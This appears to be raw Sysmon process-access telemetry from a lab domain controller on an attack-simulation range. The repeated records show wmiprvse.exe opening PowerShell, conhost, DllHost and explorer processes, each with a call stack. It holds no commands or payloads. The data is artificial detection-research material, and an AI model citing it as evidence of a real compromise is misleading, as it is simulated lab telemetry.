16:54:42.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-C9AA-00000000AD01}9940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-C7AA-00000000AD01}12492C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 